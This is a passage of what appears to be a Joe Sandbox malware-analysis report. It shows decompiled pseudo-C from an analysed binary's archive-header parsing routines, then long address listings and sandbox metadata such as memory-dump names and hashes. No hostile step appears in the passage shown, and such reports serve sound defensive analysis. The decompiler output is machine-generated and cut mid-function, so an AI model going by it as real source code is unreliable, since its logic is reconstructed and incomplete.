										_t504 = E00CCCCFB();
										_t269 = 0;
										_t432 = 1;
									}
									 *(_t399 + 0x6cf0) = _t504;
									__eflags =  *(_t399 + 0x6ccd);
									if( *(_t399 + 0x6ccd) == 0) {
										L84:
										_t432 = _t269;
										goto L85;
									} else {
										__eflags = _t504;
										if(_t504 == 0) {
											L85:
											 *((char*)(_t399 + 0x6cd1)) = _t432;
											_t433 =  *(_t548 + 0x58);
											__eflags = _t433 |  *(_t548 + 0x54);
											if((_t433 |  *(_t548 + 0x54)) != 0) {
												E00CC2210(_t399, _t504, _t548 + 0x30, _t433, _t399 + 0x2220);
											}
											goto L87;
										}
										goto L84;
									}
								} else {
									_t277 = _t257 - 1;
									__eflags = _t277;
									if(_t277 == 0) {
										L49:
										__eflags = _t502 - 2;
										_t121 = (0 | _t502 == 0x00000002) - 1; // -1
										_t522 = (_t121 & 0x00002350) + 0x2298 + _t399;
										 *(_t548 + 0x2c) = _t522;
										E00CCACC4(_t522, 0);
										_t438 = 5;
										memcpy(_t522, _t399 + 0x21fc, _t438 << 2);
										_t542 =  *(_t548 + 0x2c);
										 *(_t548 + 0x64) =  *(_t399 + 0x2200);
										 *(_t542 + 0x1058) =  *(_t548 + 0x60);
										 *((char*)(_t542 + 0x10f9)) = 1;
										 *(_t542 + 0x105c) =  *(_t548 + 0x5c);
										 *(_t542 + 0x1094) = E00CCCCFB();
										 *(_t542 + 0x1060) = E00CCCCFB();
										_t289 =  *(_t542 + 0x1094) >> 0x00000003 & 0x00000001;
										__eflags = _t289;
										 *(_t542 + 0x1064) = _t502;
										 *(_t542 + 0x109a) = _t289;
										if(_t289 != 0) {
											 *(_t542 + 0x1060) = 0x7fffffff;
											 *(_t542 + 0x1064) = 0x7fffffff;
										}
										_t442 =  *(_t542 + 0x105c);
										_t525 =  *(_t542 + 0x1064);
										_t290 =  *(_t542 + 0x1058);
										_t505 =  *(_t542 + 0x1060);
										__eflags = _t442 - _t525;
										if(__eflags < 0) {
											L54:
											_t290 = _t505;
											_t442 = _t525;
											goto L55;
										} else {
											if(__eflags > 0) {
												L55:
												 *(_t542 + 0x106c) = _t442;
												 *(_t542 + 0x1068) = _t290;
												_t291 = E00CCCCFB();
												__eflags =  *(_t542 + 0x1094) & 0x00000002;
												 *((intOrPtr*)(_t542 + 0x24)) = _t291;
												if(( *(_t542 + 0x1094) & 0x00000002) != 0) {
													E00CD158F(_t542 + 0x1040, E00CCCBFB(_t548 + 0x30), 0);
												}
												 *(_t542 + 0x1070) =  *(_t542 + 0x1070) & 0x00000000;
												__eflags =  *(_t542 + 0x1094) & 0x00000004;
												if(( *(_t542 + 0x1094) & 0x00000004) != 0) {
													 *(_t542 + 0x1070) = 2;
													 *((intOrPtr*)(_t542 + 0x1074)) = E00CCCBFB(_t548 + 0x30);
												}
												 *(_t542 + 0x1100) =  *(_t542 + 0x1100) & 0x00000000;
												_t292 = E00CCCCFB();
												 *(_t548 + 0x60) = _t292;
												 *(_t542 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
												_t450 = (_t292 & 0x0000003f) + 0x32;
												 *((intOrPtr*)(_t542 + 0x1c)) = _t450;
												__eflags = _t450 - 0x32;
												if(_t450 != 0x32) {
													 *((intOrPtr*)(_t542 + 0x1c)) = 0x270f;
												}
												 *((char*)(_t542 + 0x18)) = E00CCCCFB();
												_t526 = E00CCCCFB();
												 *(_t542 + 0x10fc) = 2;
												_t295 =  *((intOrPtr*)(_t542 + 0x18));
												 *(_t542 + 0x10f8) =  *(_t399 + 0x2204) >> 0x00000006 & 1;
												__eflags = _t295 - 1;
												if(_t295 != 1) {
													__eflags = _t295;
													if(_t295 == 0) {
														_t178 = _t542 + 0x10fc;
														 *_t178 =  *(_t542 + 0x10fc) & 0x00000000;
														__eflags =  *_t178;
													}
												} else {
													 *(_t542 + 0x10fc) = 1;
												}
												_t456 =  *(_t542 + 8);
												 *(_t542 + 0x1098) = _t456 >> 0x00000003 & 1;
												 *(_t542 + 0x10fa) = _t456 >> 0x00000005 & 1;
												__eflags =  *(_t548 + 0x64) - 2;
												_t459 =  *(_t548 + 0x60);
												 *(_t542 + 0x1099) = _t456 >> 0x00000004 & 1;
												if( *(_t548 + 0x64) != 2) {
													L68:
													_t302 = 0;
													__eflags = 0;
													goto L69;
												} else {
													__eflags = _t459 & 0x00000040;
													if((_t459 & 0x00000040) == 0) {
														goto L68;
													}
													_t302 = 1;
													L69:
													 *((char*)(_t542 + 0x10f0)) = _t302;
													_t304 =  *(_t542 + 0x1094) & 1;
													 *(_t542 + 0x10f1) = _t304;
													_t509 = 0x20000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x109c) =  ~( *(_t542 + 0x109b) & 0x000000ff) & 0x00000005;
													__eflags = _t526 - 0x1fff;
													if(_t526 >= 0x1fff) {
														_t526 = 0x1fff;
													}
													E00CCCC5D(_t548 + 0x30, _t548 - 0x2074, _t526);
													 *((char*)(_t548 + _t526 - 0x2074)) = 0;
													_push(0x800);
													_t527 = _t542 + 0x28;
													_push(_t542 + 0x28);
													_push(_t548 - 0x2074);
													E00CD1C3B();
													_t463 =  *(_t548 + 0x58);
													_t318 = _t463 |  *(_t548 + 0x54);
													__eflags = _t463 |  *(_t548 + 0x54);
													if((_t463 |  *(_t548 + 0x54)) != 0) {
														_t318 = E00CC2210(_t399, _t509, _t548 + 0x30, _t463, _t542);
													}
													__eflags =  *(_t548 + 0x64) - 2;
													if( *(_t548 + 0x64) != 2) {
														_t319 = E00CE3E49(_t318, _t527, L"CMT");
														__eflags = _t319;
														if(_t319 == 0) {
															 *((char*)(_t399 + 0x6cce)) = 1;
														}
													} else {
														E00CC2134(_t399, _t542);
													}
													__eflags =  *(_t548 + 0x6b);
													if(__eflags != 0) {
														E00CC2021(__eflags, 0x1c, _t399 + 0x32, _t527);
													}
													L87:
													 *(_t548 + 0x64) =  *(_t548 + 0x48);
													goto L89;
												}
											}
											__eflags = _t290 - _t505;
											if(_t290 > _t505) {
												goto L55;
											}
											goto L54;
										}
									}
									_t328 = _t277 - 1;
									__eflags = _t328;
									if(_t328 == 0) {
										goto L49;
									}
									_t329 = _t328 - 1;
									__eflags = _t329;
									if(_t329 == 0) {
										_t471 = 5;
										memcpy(_t399 + 0x2260, _t399 + 0x21fc, _t471 << 2);
										_t331 = E00CCCCFB();
										__eflags = _t331;
										if(_t331 == 0) {
											 *(_t399 + 0x2274) = E00CCCCFB() & 0x00000001;
											_t335 = E00CCCBAF(_t548 + 0x30) & 0x000000ff;
											 *(_t399 + 0x2278) = _t335;
											__eflags = _t335 - 0x18;
											if(_t335 <= 0x18) {
												E00CCCC5D(_t548 + 0x30, _t399 + 0x227c, 0x10);
												__eflags =  *(_t399 + 0x2274);
												if( *(_t399 + 0x2274) != 0) {
													_t544 = _t399 + 0x228c;
													E00CCCC5D(_t548 + 0x30, _t544, 8);
													E00CCCC5D(_t548 + 0x30, _t548 + 0x64, 4);
													E00CD0016(_t548 - 0x74);
													_push(8);
													_push(_t544);
													_push(_t548 - 0x74);
													E00CD005C();
													_push(_t548 + 8);
													E00CCFF33(_t548 - 0x74);
													_t350 = E00CE0C4A(_t548 + 0x64, _t548 + 8, 4);
													asm("sbb al, al");
													_t352 =  ~_t350 + 1;
													__eflags = _t352;
													 *(_t399 + 0x2274) = _t352;
												}
												 *((char*)(_t399 + 0x6cd4)) = 1;
												goto L87;
											}
											_push(_t335);
											_push(L"hc%u");
											L43:
											_push(0x14);
											_push(_t548);
											E00CC4092();
											E00CC403D(_t399, _t399 + 0x32, _t548);
											goto L89;
										}
										_push(_t331);
										_push(L"h%u");
										goto L43;
									}
									__eflags = _t329 == 1;
									if(_t329 == 1) {
										_t480 = 5;
										memcpy(_t399 + 0x45a8, _t399 + 0x21fc, _t480 << 2);
										 *(_t399 + 0x45c4) = E00CCCCFB() & 0x00000001;
										 *((short*)(_t399 + 0x45c6)) = 0;
										 *((char*)(_t399 + 0x45c5)) = 0;
									}
									goto L87;
								}
							}
							_t485 = E00CCCCFB();
							 *(_t548 + 0x54) = _t500;
							_t252 = 0;
							 *(_t548 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L33;
							}
							if(__eflags > 0) {
								goto L88;
							}
							__eflags = _t485 -  *((intOrPtr*)(_t399 + 0x2208));
							if(_t485 >=  *((intOrPtr*)(_t399 + 0x2208))) {
								goto L88;
							}
							goto L33;
						}
						E00CC20D7(_t399);
						 *((char*)(_t399 + 0x6cdc)) = 1;
						E00CC6D83(0xd01098, 3);
						__eflags =  *((char*)(_t548 + 0x6a));
						if(__eflags == 0) {
							goto L29;
						} else {
							E00CC2021(__eflags, 4, _t399 + 0x32, _t399 + 0x32);
							L6:
							 *((char*)(_t399 + 0x6cdd)) = 1;
							goto L89;
						}
					}
					L20:
					E00CC3FFC(_t399, _t500);
					goto L89;
				}
				_t500 =  *((intOrPtr*)(__ecx + 0x6cd8)) + 8;
				asm("adc eax, ecx");
				_t561 =  *((intOrPtr*)(__ecx + 0x6cbc));
				if(_t561 < 0 || _t561 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t500) {
					goto L18;
				} else {
					_t370 =  *((intOrPtr*)(_t399 + 0x21d4));
					 *((char*)(_t548 + 0x6a)) = 1;
					_t563 =  *((intOrPtr*)(_t370 + 0x6127));
					if( *((intOrPtr*)(_t370 + 0x6127)) == 0) {
						 *0xcf3278(_t548 + 0x18, 0x10);
						_t373 =  *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xc))))();
						__eflags = _t373 - 0x10;
						if(_t373 != 0x10) {
							goto L20;
						}
						_t374 =  *((intOrPtr*)(_t399 + 0x21d4));
						__eflags =  *((char*)(_t374 + 0x6124));
						if( *((char*)(_t374 + 0x6124)) != 0) {
							L10:
							 *(_t548 + 0x6b) = 1;
							L11:
							E00CC3E6D(_t399);
							_t534 = _t399 + 0x227c;
							_t547 = _t399 + 0x1038;
							E00CC603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t399 + 0x227c, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
							__eflags =  *(_t399 + 0x2274);
							if( *(_t399 + 0x2274) == 0) {
								L16:
								 *((intOrPtr*)(_t548 + 0x50)) = _t547;
								goto L19;
							} else {
								_t381 = _t399 + 0x228c;
								while(1) {
									_t383 = E00CE0C4A(_t548 + 0x28, _t381, 8);
									_t551 = _t551 + 0xc;
									__eflags = _t383;
									if(_t383 == 0) {
										goto L16;
									}
									__eflags =  *(_t548 + 0x6b);
									_t384 = _t399 + 0x32;
									_push(_t384);
									_push(_t384);
									if(__eflags != 0) {
										_push(6);
										E00CC2021(__eflags);
										 *((char*)(_t399 + 0x6cdd)) = 1;
										E00CC6D83(0xd01098, 0xb);
										goto L89;
									}
									_push(0x83);
									E00CC2021(__eflags);
									E00CCF279( *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024);
									E00CC3E6D(_t399);
									E00CC603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t534, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
									__eflags =  *(_t399 + 0x2274);
									_t381 = _t399 + 0x228c;
									if( *(_t399 + 0x2274) != 0) {
										continue;
									}
									goto L16;
								}
								goto L16;
							}
						}
						_t395 = E00CD1B63();
						 *(_t548 + 0x6b) = 0;
						__eflags = _t395;
						if(_t395 == 0) {
							goto L11;
						}
						goto L10;
					} else {
						E00CC138B(_t563, 0x7f, _t399 + 0x32);
						goto L6;
					}
				}
			}



































































                                                    0x00cc32f8
                                                    0x00cc3300
                                                    0x00cc330a
                                                    0x00cc3311
                                                    0x00cc3318
                                                    0x00cc331f
                                                    0x00cc3322
                                                    0x00cc332b
                                                    0x00cc34a6
                                                    0x00cc34a6
                                                    0x00cc34a9
                                                    0x00cc34a9
                                                    0x00cc34ae
                                                    0x00cc34b3
                                                    0x00cc34b6
                                                    0x00cc34c7
                                                    0x00cc34d8
                                                    0x00cc34e6
                                                    0x00cc34e8
                                                    0x00cc34ef
                                                    0x00cc34f1
                                                    0x00cc3b09
                                                    0x00cc3b0b
                                                    0x00cc3b10
                                                    0x00cc3b13
                                                    0x00cc3b21
                                                    0x00cc3b2c
                                                    0x00cc3b2c
                                                    0x00cc34f7
                                                    0x00cc34f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc34ff
                                                    0x00cc3502
                                                    0x00cc3505
                                                    0x00cc3507
                                                    0x00cc3507
                                                    0x00cc3509
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc350f
                                                    0x00cc3512
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3518
                                                    0x00cc351c
                                                    0x00cc3521
                                                    0x00cc3524
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3529
                                                    0x00cc353b
                                                    0x00cc3541
                                                    0x00cc3546
                                                    0x00cc3551
                                                    0x00cc3557
                                                    0x00cc355d
                                                    0x00cc3563
                                                    0x00cc356b
                                                    0x00cc3571
                                                    0x00cc3571
                                                    0x00cc3571
                                                    0x00cc3575
                                                    0x00cc35a8
                                                    0x00cc35a8
                                                    0x00cc35aa
                                                    0x00cc35b1
                                                    0x00cc35b4
                                                    0x00cc35b7
                                                    0x00cc35e1
                                                    0x00cc35e1
                                                    0x00cc35e8
                                                    0x00cc35ea
                                                    0x00cc35ed
                                                    0x00cc35f0
                                                    0x00cc35f5
                                                    0x00cc35fa
                                                    0x00cc35fc
                                                    0x00cc35ff
                                                    0x00cc35ff
                                                    0x00cc360a
                                                    0x00cc3622
                                                    0x00cc362c
                                                    0x00cc3632
                                                    0x00cc3638
                                                    0x00cc3640
                                                    0x00cc3640
                                                    0x00cc3643
                                                    0x00cc3a50
                                                    0x00cc3a5f
                                                    0x00cc3a60
                                                    0x00cc3a6a
                                                    0x00cc3a73
                                                    0x00cc3a85
                                                    0x00cc3a8d
                                                    0x00cc3a90
                                                    0x00cc3a96
                                                    0x00cc3aa3
                                                    0x00cc3aa9
                                                    0x00cc3aab
                                                    0x00cc3ab1
                                                    0x00cc3ab4
                                                    0x00cc3ac7
                                                    0x00cc3ab6
                                                    0x00cc3abe
                                                    0x00cc3ac2
                                                    0x00cc3ac4
                                                    0x00cc3ac4
                                                    0x00cc3ac9
                                                    0x00cc3acf
                                                    0x00cc3ad6
                                                    0x00cc3adc
                                                    0x00cc3adc
                                                    0x00000000
                                                    0x00cc3ad8
                                                    0x00cc3ad8
                                                    0x00cc3ada
                                                    0x00cc3ade
                                                    0x00cc3ade
                                                    0x00cc3ae4
                                                    0x00cc3ae9
                                                    0x00cc3aec
                                                    0x00cc3afc
                                                    0x00cc3afc
                                                    0x00000000
                                                    0x00cc3aec
                                                    0x00000000
                                                    0x00cc3ada
                                                    0x00cc3649
                                                    0x00cc3649
                                                    0x00cc3649
                                                    0x00cc364c
                                                    0x00cc3796
                                                    0x00cc3798
                                                    0x00cc37a0
                                                    0x00cc37af
                                                    0x00cc37b3
                                                    0x00cc37b6
                                                    0x00cc37bd
                                                    0x00cc37c4
                                                    0x00cc37cf
                                                    0x00cc37d2
                                                    0x00cc37d8
                                                    0x00cc37e1
                                                    0x00cc37e8
                                                    0x00cc37f6
                                                    0x00cc3801
                                                    0x00cc3810
                                                    0x00cc3810
                                                    0x00cc3812
                                                    0x00cc3818
                                                    0x00cc381e
                                                    0x00cc3825
                                                    0x00cc382b
                                                    0x00cc382b
                                                    0x00cc3831
                                                    0x00cc3837
                                                    0x00cc383d
                                                    0x00cc3843
                                                    0x00cc3849
                                                    0x00cc384b
                                                    0x00cc3853
                                                    0x00cc3853
                                                    0x00cc3855
                                                    0x00000000
                                                    0x00cc384d
                                                    0x00cc384d
                                                    0x00cc3857
                                                    0x00cc3857
                                                    0x00cc3860
                                                    0x00cc3866
                                                    0x00cc386b
                                                    0x00cc3872
                                                    0x00cc3875
                                                    0x00cc3888
                                                    0x00cc3888
                                                    0x00cc388d
                                                    0x00cc3894
                                                    0x00cc389b
                                                    0x00cc38a0
                                                    0x00cc38af
                                                    0x00cc38af
                                                    0x00cc38b5
                                                    0x00cc38bf
                                                    0x00cc38c6
                                                    0x00cc38cf
                                                    0x00cc38d7
                                                    0x00cc38da
                                                    0x00cc38dd
                                                    0x00cc38e0
                                                    0x00cc38e2
                                                    0x00cc38e2
                                                    0x00cc38f4
                                                    0x00cc3908
                                                    0x00cc390a
                                                    0x00cc3914
                                                    0x00cc3919
                                                    0x00cc391f
                                                    0x00cc3921
                                                    0x00cc392b
                                                    0x00cc392d
                                                    0x00cc392f
                                                    0x00cc392f
                                                    0x00cc392f
                                                    0x00cc392f
                                                    0x00cc3923
                                                    0x00cc3923
                                                    0x00cc3923
                                                    0x00cc3936
                                                    0x00cc3940
                                                    0x00cc3952
                                                    0x00cc3958
                                                    0x00cc395c
                                                    0x00cc395f
                                                    0x00cc3965
                                                    0x00cc3970
                                                    0x00cc3970
                                                    0x00cc3970
                                                    0x00000000
                                                    0x00cc3967
                                                    0x00cc3967
                                                    0x00cc396a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc396c
                                                    0x00cc3972
                                                    0x00cc3972
                                                    0x00cc397e
                                                    0x00cc3983
                                                    0x00cc3994
                                                    0x00cc3998
                                                    0x00cc399e
                                                    0x00cc39ad
                                                    0x00cc39b2
                                                    0x00cc39bd
                                                    0x00cc39bf
                                                    0x00cc39c1
                                                    0x00cc39c1
                                                    0x00cc39ce
                                                    0x00cc39d3
                                                    0x00cc39e1
                                                    0x00cc39e6
                                                    0x00cc39e9
                                                    0x00cc39ea
                                                    0x00cc39eb
                                                    0x00cc39f0
                                                    0x00cc39f5
                                                    0x00cc39f5
                                                    0x00cc39f8
                                                    0x00cc3a02
                                                    0x00cc3a02
                                                    0x00cc3a07
                                                    0x00cc3a0b
                                                    0x00cc3a1d
                                                    0x00cc3a24
                                                    0x00cc3a26
                                                    0x00cc3a28
                                                    0x00cc3a28
                                                    0x00cc3a0d
                                                    0x00cc3a10
                                                    0x00cc3a10
                                                    0x00cc3a2f
                                                    0x00cc3a33
                                                    0x00cc3a40
                                                    0x00cc3a40
                                                    0x00cc3b01
                                                    0x00cc3b04
                                                    0x00000000
                                                    0x00cc3b04
                                                    0x00cc3965
                                                    0x00cc384f
                                                    0x00cc3851
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3851
                                                    0x00cc384b
                                                    0x00cc3652
                                                    0x00cc3652
                                                    0x00cc3655
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc365b
                                                    0x00cc365b
                                                    0x00cc365e
                                                    0x00cc36a0
                                                    0x00cc36ad
                                                    0x00cc36b2
                                                    0x00cc36b7
                                                    0x00cc36b9
                                                    0x00cc36f0
                                                    0x00cc36fb
                                                    0x00cc36fe
                                                    0x00cc3704
                                                    0x00cc3707
                                                    0x00cc371d
                                                    0x00cc3722
                                                    0x00cc3729
                                                    0x00cc372d
                                                    0x00cc3737
                                                    0x00cc3745
                                                    0x00cc374e
                                                    0x00cc3753
                                                    0x00cc3755
                                                    0x00cc3759
                                                    0x00cc375a
                                                    0x00cc3762
                                                    0x00cc3767
                                                    0x00cc3776
                                                    0x00cc3780
                                                    0x00cc3782
                                                    0x00cc3782
                                                    0x00cc3784
                                                    0x00cc3784
                                                    0x00cc378a
                                                    0x00000000
                                                    0x00cc378a
                                                    0x00cc3709
                                                    0x00cc370a
                                                    0x00cc36c1
                                                    0x00cc36c4
                                                    0x00cc36c6
                                                    0x00cc36c7
                                                    0x00cc36d9
                                                    0x00000000
                                                    0x00cc36d9
                                                    0x00cc36bb
                                                    0x00cc36bc
                                                    0x00000000
                                                    0x00cc36bc
                                                    0x00cc3660
                                                    0x00cc3663
                                                    0x00cc366b
                                                    0x00cc3678
                                                    0x00cc3684
                                                    0x00cc368c
                                                    0x00cc3693
                                                    0x00cc3693
                                                    0x00000000
                                                    0x00cc3663
                                                    0x00cc3643
                                                    0x00cc35c1
                                                    0x00cc35c3
                                                    0x00cc35c6
                                                    0x00cc35c8
                                                    0x00cc35cb
                                                    0x00cc35cd
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc35cf
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc35d5
                                                    0x00cc35db
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc35db
                                                    0x00cc3579
                                                    0x00cc3585
                                                    0x00cc358c
                                                    0x00cc3591
                                                    0x00cc3595
                                                    0x00000000
                                                    0x00cc3597
                                                    0x00cc359e
                                                    0x00cc3375
                                                    0x00cc3375
                                                    0x00000000
                                                    0x00cc3375
                                                    0x00cc3595
                                                    0x00cc34b8
                                                    0x00cc34ba
                                                    0x00000000
                                                    0x00cc34ba
                                                    0x00cc3339
                                                    0x00cc333c
                                                    0x00cc333e
                                                    0x00cc3344
                                                    0x00000000
                                                    0x00cc3358
                                                    0x00cc3358
                                                    0x00cc335e
                                                    0x00cc3362
                                                    0x00cc3368
                                                    0x00cc338e
                                                    0x00cc3396
                                                    0x00cc3398
                                                    0x00cc339b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc33a1
                                                    0x00cc33a7
                                                    0x00cc33ae
                                                    0x00cc33bd
                                                    0x00cc33bd
                                                    0x00cc33c1
                                                    0x00cc33c3
                                                    0x00cc33df
                                                    0x00cc33eb
                                                    0x00cc33f7
                                                    0x00cc33fc
                                                    0x00cc3403
                                                    0x00cc3482
                                                    0x00cc3482
                                                    0x00000000
                                                    0x00cc3405
                                                    0x00cc3405
                                                    0x00cc340b
                                                    0x00cc3412
                                                    0x00cc3417
                                                    0x00cc341a
                                                    0x00cc341c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc341e
                                                    0x00cc3422
                                                    0x00cc3425
                                                    0x00cc3426
                                                    0x00cc3427
                                                    0x00cc3487
                                                    0x00cc3489
                                                    0x00cc3495
                                                    0x00cc349c
                                                    0x00000000
                                                    0x00cc349c
                                                    0x00cc3429
                                                    0x00cc342e
                                                    0x00cc343f
                                                    0x00cc3446
                                                    0x00cc346e
                                                    0x00cc3473
                                                    0x00cc347a
                                                    0x00cc3480
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3480
                                                    0x00000000
                                                    0x00cc340b
                                                    0x00cc3403
                                                    0x00cc33b0
                                                    0x00cc33b5
                                                    0x00cc33b9
                                                    0x00cc33bb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc336a
                                                    0x00cc3370
                                                    0x00000000
                                                    0x00cc3370
                                                    0x00cc3368

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_swprintf
                                                    • String ID: CMT$h%u$hc%u
                                                    • API String ID: 146138363-3282847064
                                                    • Opcode ID: 6fe2d36157a4f679001fc7458e4c52eca0f0d6d04b71d145dd98f0ef2f6ca015
                                                    • Instruction ID: b4e371493b3eaecfb67e080f6a341349a5700cbe6da2c8a11302c1ae45bad27d
                                                    • Opcode Fuzzy Hash: 6fe2d36157a4f679001fc7458e4c52eca0f0d6d04b71d145dd98f0ef2f6ca015
                                                    • Instruction Fuzzy Hash: BD32C371510384ABDF18DF74C895FE93BA5AF15300F08447EFD9A8B282DB749A49DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00CC286B(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t329;
				signed int _t334;
				void* _t335;
				void* _t337;
				signed int _t340;
				char _t354;
				signed short _t361;
				signed int _t364;
				signed int _t371;
				signed char _t374;
				signed char _t377;
				signed int _t378;
				signed int _t395;
				signed int _t396;
				signed int _t400;
				signed char _t413;
				intOrPtr _t414;
				char _t415;
				signed int _t418;
				signed int _t419;
				signed int _t424;
				signed int _t427;
				signed int _t432;
				signed short _t437;
				signed short _t442;
				unsigned int _t447;
				signed int _t450;
				signed int _t455;
				signed int _t469;
				void* _t470;
				void* _t478;
				signed char _t484;
				signed int _t488;
				signed int _t498;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				intOrPtr* _t516;
				signed int _t520;
				signed int _t521;
				signed int _t533;
				signed int _t537;
				signed int _t539;
				unsigned int _t548;
				signed int _t550;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				intOrPtr* _t585;
				void* _t593;
				signed int _t597;
				intOrPtr _t609;
				signed int _t612;
				signed int _t624;
				signed char _t628;
				void* _t639;
				signed char _t640;
				signed int _t643;
				unsigned int _t644;
				signed int _t647;
				signed int _t648;
				signed int _t650;
				signed int _t651;
				unsigned int _t653;
				signed int _t657;
				void* _t659;
				void* _t665;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed int _t672;
				void* _t673;
				signed int _t675;
				intOrPtr* _t676;
				signed int _t688;
				void* _t694;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t701;
				intOrPtr _t707;
				intOrPtr* _t708;
				intOrPtr _t718;

				E00CDEB78(0xcf26a5, _t708);
				E00CDEC50(0x2024);
				_t516 = __ecx;
				 *((intOrPtr*)(_t708 + 0x14)) = __ecx;
				E00CCCB83(_t708 + 0x1c, __ecx);
				 *(_t708 + 0x10) = 0;
				 *((intOrPtr*)(_t708 - 4)) = 0;
				_t657 = 7;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L7:
					 *((char*)(_t708 + 0x5a)) = 0;
					L8:
					_push(_t657);
					E00CCCD8A();
					__eflags =  *(_t708 + 0x34);
					if( *(_t708 + 0x34) == 0) {
						L5:
						E00CC3FFC(_t516, _t639);
						L131:
						E00CC15FB(_t708 + 0x1c);
						 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
						return  *(_t708 + 0x10);
					}
					 *(_t516 + 0x21fc) = E00CCCBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x220c) = 0;
					_t688 = E00CCCBAF(_t708 + 0x1c) & 0x000000ff;
					_t329 = E00CCCBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2204) = _t329;
					 *(_t516 + 0x220c) = _t329 >> 0x0000000e & 0x00000001;
					_t533 = E00CCCBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2208) = _t533;
					 *(_t516 + 0x2200) = _t688;
					__eflags = _t533 - _t657;
					if(_t533 >= _t657) {
						_t640 = 2;
						_t334 = _t688 - 0x73;
						__eflags = _t334;
						if(_t334 == 0) {
							 *(_t516 + 0x2200) = 1;
							_t688 = 1;
							__eflags = 1;
							L20:
							 *(_t516 + 0x21f4) = _t688;
							__eflags = _t688 - 0x75;
							if(_t688 == 0x75) {
								L23:
								_t335 = 6;
								L25:
								_push(_t335);
								E00CCCD8A();
								_t337 = E00CC1983(_t516,  *(_t516 + 0x2208));
								asm("adc ecx, 0x0");
								 *((intOrPtr*)(_t516 + 0x6cc0)) = _t337 +  *((intOrPtr*)(_t516 + 0x6cb8));
								 *(_t516 + 0x6cc4) =  *(_t516 + 0x6cbc);
								_t537 =  *(_t516 + 0x2200);
								 *(_t708 + 0x18) = _t537;
								_t340 = _t537 - 1;
								__eflags = _t340;
								if(_t340 == 0) {
									_t659 = _t516 + 0x2220;
									E00CCAD5E(_t659);
									_t539 = 5;
									memcpy(_t659, _t516 + 0x21fc, _t539 << 2);
									 *(_t516 + 0x2234) = E00CCCBC6(_t708 + 0x1c);
									_t640 = E00CCCBFB(_t708 + 0x1c);
									 *(_t516 + 0x2238) = _t640;
									 *(_t516 + 0x6ccd) =  *(_t516 + 0x2228) & 0x00000001;
									 *(_t516 + 0x6ccc) =  *(_t516 + 0x2228) >> 0x00000003 & 0x00000001;
									_t548 =  *(_t516 + 0x2228);
									 *(_t516 + 0x6ccf) = _t548 >> 0x00000002 & 0x00000001;
									 *(_t516 + 0x6cd3) = _t548 >> 0x00000006 & 0x00000001;
									 *(_t516 + 0x6cd4) = _t548 >> 0x00000007 & 0x00000001;
									__eflags = _t640;
									if(_t640 != 0) {
										L117:
										_t354 = 1;
										L118:
										 *((char*)(_t516 + 0x6cd0)) = _t354;
										 *(_t516 + 0x223c) = _t548 >> 0x00000001 & 0x00000001;
										_t550 = _t548 >> 0x00000004 & 0x00000001;
										__eflags = _t550;
										 *(_t516 + 0x6cd1) = _t548 >> 0x00000008 & 0x00000001;
										 *(_t516 + 0x6cd2) = _t550;
										L119:
										_t657 = 7;
										L120:
